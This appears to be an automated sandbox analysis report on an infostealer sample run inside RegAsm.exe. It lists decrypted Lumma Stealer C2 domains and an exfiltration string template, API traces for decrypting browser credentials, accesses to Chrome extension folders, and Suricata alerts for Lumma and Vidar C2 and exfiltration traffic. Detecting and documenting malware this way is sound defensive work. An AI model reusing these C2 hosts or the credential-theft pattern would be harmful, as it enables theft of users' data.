Source: 0000000C.00000002.2800620495.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: offensivedzvju.shop
Source: 0000000C.00000002.2800620495.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: ghostreedmnu.shop
Source: 0000000C.00000002.2800620495.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: gutterydhowi.shop
Source: 0000000C.00000002.2800620495.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: ghostreedmnu.shop
Source: 0000000C.00000002.2800620495.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000C.00000002.2800620495.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000000C.00000002.2800620495.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 0000000C.00000002.2800620495.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000000C.00000002.2800620495.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 0000000C.00000002.2800620495.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: H8NgCl--

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,	4_2_004080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	4_2_00408048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	4_2_00411E5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,	4_2_0040A7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C096C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	4_2_6C096C80

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.105.54.160:443 -> 192.168.2.5:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.32:443 -> 192.168.2.5:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.5:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.208.139:443 -> 192.168.2.5:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.2.13:443 -> 192.168.2.5:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.5:49758 version: TLS 1.2

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000004.00000002.2794093889.0000000028985000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.4.dr
Source:	Binary string: freebl3.pdb source: RegAsm.exe, 00000004.00000002.2788891835.0000000022A14000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
Source:	Binary string: freebl3.pdbp source: RegAsm.exe, 00000004.00000002.2788891835.0000000022A14000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000004.00000002.2820023276.000000006C2BF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.dr
Source:	Binary string: c:\rje\tg\\obj\Release\ojc.pdb source: file.exe
Source:	Binary string: c:\rje\tg\obj\Release\ojc.pdb source: FIEHIIIJDA.exe.4.dr, vdshfd[1].exe.4.dr
Source:	Binary string: c:\rje\tg\12rr6\obj\Release\ojc.pdb source: ljhgfsd[1].exe.4.dr, FBFHJJJDAF.exe.4.dr
Source:	Binary string: softokn3.pdb@ source: RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000004.00000002.2805489536.000000003A7DE000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.4.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000004.00000002.2798282941.000000002E8F6000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.4.dr
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000004.00000002.2820023276.000000006C2BF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000004.00000002.2808642566.0000000040746000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.dr
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000004.00000002.2794093889.0000000028985000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.4.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000004.00000002.2788058569.0000000022338000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2779917513.000000001C3CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.3172572540.000000002005B000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: RegAsm.exe, 00000004.00000002.2802216164.0000000034867000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	4_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose,	4_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	4_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	4_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	4_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	4_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	4_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	4_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	4_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	4_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	4_2_0040CD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

4_2_00415142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]	4_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax	4_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then xor eax, eax	12_2_0040F042
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	12_2_0040D470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+01h], 00000000h	12_2_0040F807
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 68677325h	12_2_00447AC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	12_2_00447AC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+14h]	12_2_00447D38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2EE0190Fh	12_2_00447E1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, esi	12_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	12_2_0044B010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	12_2_00425030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then add ecx, dword ptr [esp+eax*4+30h]	12_2_0040C1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	12_2_0044B1A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	12_2_00427230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	12_2_004452E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	12_2_004142E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	12_2_0044B320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]	12_2_00407450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	12_2_00412450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+08h]	12_2_00412450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+08h]	12_2_00412450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	12_2_00412450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	12_2_00442410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	12_2_0044B430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	12_2_004314A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	12_2_004404AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	12_2_0044A510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], cl	12_2_00435519
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	12_2_00433623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh	12_2_00449620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	12_2_00434629
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+01h], 00000000h	12_2_0040F63A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [ebx], 00000000h	12_2_00414692
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000668h]	12_2_0041E71A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 77DD2217h	12_2_0041E71A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+01h], 00000000h	12_2_0040F7E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+000001C8h]	12_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000198h]	12_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	12_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	12_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	12_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	12_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	12_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	12_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	12_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	12_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	12_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	12_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	12_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	12_2_004408E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+14h]	12_2_00444970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000884h]	12_2_00429978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	12_2_00434990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	12_2_00434990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	12_2_00434990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	12_2_00420A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	12_2_00440A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	12_2_0040FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	12_2_0040FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	12_2_0040FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh	12_2_0042CAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	12_2_0042CAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	12_2_00421AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	12_2_00444BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	12_2_0041AB90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh	12_2_00448B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	12_2_00430CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	12_2_00405CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	12_2_00404CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	12_2_00449D22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	12_2_00445DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, word ptr [edi+eax]	12_2_00448D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	12_2_0042FE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	12_2_0042FE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then add ebx, 02h	12_2_00413EEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	12_2_00413EEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then dec ebx	12_2_0043FE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	12_2_00426FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp dword ptr [004521ECh]	12_2_0041FFD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+eax+01h], 00000000h	12_2_0042DFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	12_2_0043BFF0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056162 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop) : 192.168.2.5:50647 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056164 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop) : 192.168.2.5:57503 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056163 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI) : 192.168.2.5:49741 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2056160 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop) : 192.168.2.5:61063 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056163 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI) : 192.168.2.5:49744 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2056157 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI) : 192.168.2.5:49748 -> 172.67.162.108:443
Source: Network traffic	Suricata IDS: 2056151 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI) : 192.168.2.5:49753 -> 172.67.208.139:443
Source: Network traffic	Suricata IDS: 2056159 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI) : 192.168.2.5:49747 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2056152 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop) : 192.168.2.5:65058 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056153 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI) : 192.168.2.5:49752 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2056158 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop) : 192.168.2.5:60331 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056154 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop) : 192.168.2.5:63469 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056156 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop) : 192.168.2.5:53384 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056150 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop) : 192.168.2.5:60357 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056155 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI) : 192.168.2.5:49750 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2056165 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI) : 192.168.2.5:49742 -> 172.67.132.32:443
Source: Network traffic	Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.5:49751 -> 45.132.206.251:80
Source: Network traffic	Suricata IDS: 2056161 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI) : 192.168.2.5:49745 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.5:49718 -> 5.75.211.162:443
